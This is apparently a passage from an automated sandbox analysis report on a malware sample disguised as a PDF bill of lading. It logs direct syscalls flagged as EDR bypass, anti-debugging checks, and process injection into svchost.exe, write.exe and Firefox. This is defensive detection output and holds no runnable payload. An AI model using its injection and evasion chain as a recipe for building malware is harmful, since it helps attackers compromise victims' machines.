            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04A80 mov eax, dword ptr fs:[00000030h]1_2_03D04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68A90 mov edx, dword ptr fs:[00000030h]1_2_03C68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38AA0 mov eax, dword ptr fs:[00000030h]1_2_03C38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38AA0 mov eax, dword ptr fs:[00000030h]1_2_03C38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86AA4 mov eax, dword ptr fs:[00000030h]1_2_03C86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40A5B mov eax, dword ptr fs:[00000030h]1_2_03C40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40A5B mov eax, dword ptr fs:[00000030h]1_2_03C40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]1_2_03C6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]1_2_03C6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]1_2_03C6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDEA60 mov eax, dword ptr fs:[00000030h]1_2_03CDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CACA72 mov eax, dword ptr fs:[00000030h]1_2_03CACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CACA72 mov eax, dword ptr fs:[00000030h]1_2_03CACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBCA11 mov eax, dword ptr fs:[00000030h]1_2_03CBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA24 mov eax, dword ptr fs:[00000030h]1_2_03C6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EA2E mov eax, dword ptr fs:[00000030h]1_2_03C5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C54A35 mov eax, dword ptr fs:[00000030h]1_2_03C54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C54A35 mov eax, dword ptr fs:[00000030h]1_2_03C54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC69C0 mov eax, dword ptr fs:[00000030h]1_2_03CC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C649D0 mov eax, dword ptr fs:[00000030h]1_2_03C649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]1_2_03CFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]1_2_03CBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C629F9 mov eax, dword ptr fs:[00000030h]1_2_03C629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C629F9 mov eax, dword ptr fs:[00000030h]1_2_03C629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C309AD mov eax, dword ptr fs:[00000030h]1_2_03C309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C309AD mov eax, dword ptr fs:[00000030h]1_2_03C309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB89B3 mov esi, dword ptr fs:[00000030h]1_2_03CB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h]1_2_03CB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h]1_2_03CB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0946 mov eax, dword ptr fs:[00000030h]1_2_03CB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04940 mov eax, dword ptr fs:[00000030h]1_2_03D04940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]1_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]1_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]1_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E mov eax, dword ptr fs:[00000030h]1_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E mov edx, dword ptr fs:[00000030h]1_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E mov eax, dword ptr fs:[00000030h]1_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4978 mov eax, dword ptr fs:[00000030h]1_2_03CD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4978 mov eax, dword ptr fs:[00000030h]1_2_03CD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC97C mov eax, dword ptr fs:[00000030h]1_2_03CBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE908 mov eax, dword ptr fs:[00000030h]1_2_03CAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE908 mov eax, dword ptr fs:[00000030h]1_2_03CAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC912 mov eax, dword ptr fs:[00000030h]1_2_03CBC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28918 mov eax, dword ptr fs:[00000030h]1_2_03C28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28918 mov eax, dword ptr fs:[00000030h]1_2_03C28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB892A mov eax, dword ptr fs:[00000030h]1_2_03CB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC892B mov eax, dword ptr fs:[00000030h]1_2_03CC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]1_2_03C5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D008C0 mov eax, dword ptr fs:[00000030h]1_2_03D008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]1_2_03CFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03C6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03C6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30887 mov eax, dword ptr fs:[00000030h]1_2_03C30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC89D mov eax, dword ptr fs:[00000030h]1_2_03CBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C42840 mov ecx, dword ptr fs:[00000030h]1_2_03C42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60854 mov eax, dword ptr fs:[00000030h]1_2_03C60854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h]1_2_03C34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h]1_2_03C34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE872 mov eax, dword ptr fs:[00000030h]1_2_03CBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE872 mov eax, dword ptr fs:[00000030h]1_2_03CBE872
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00426DA1
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0042202E SetUnhandledExceptionFilter,0_2_0042202E
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004230F5
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00417D93
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00421FA7

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\write.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\write.exeThread register set: target process: 6120Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\write.exeThread APC queued: target process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 315A008Jump to behavior
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0043916A LogonUserW,0_2_0043916A
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_00436431
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe"Jump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00445DD3
            Source: Bill Of Lading_MEDUVB935991.pdf.exe, gNKNuXuipEBZec.exe, 00000005.00000000.2113285816.0000000001BF0000.00000002.00000001.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000005.00000002.4197956117.0000000001BF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: gNKNuXuipEBZec.exe, 00000005.00000000.2113285816.0000000001BF0000.00000002.00000001.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000005.00000002.4197956117.0000000001BF1000.00000002.00000001.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000000.2262976947.0000000001290000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: Bill Of Lading_MEDUVB935991.pdf.exeBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: gNKNuXuipEBZec.exe, 00000005.00000000.2113285816.0000000001BF0000.00000002.00000001.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000005.00000002.4197956117.0000000001BF1000.00000002.00000001.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000000.2262976947.0000000001290000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: gNKNuXuipEBZec.exe, 00000005.00000000.2113285816.0000000001BF0000.00000002.00000001.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000005.00000002.4197956117.0000000001BF1000.00000002.00000001.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000000.2262976947.0000000001290000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00410D10 cpuid 0_2_00410D10
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004223BC
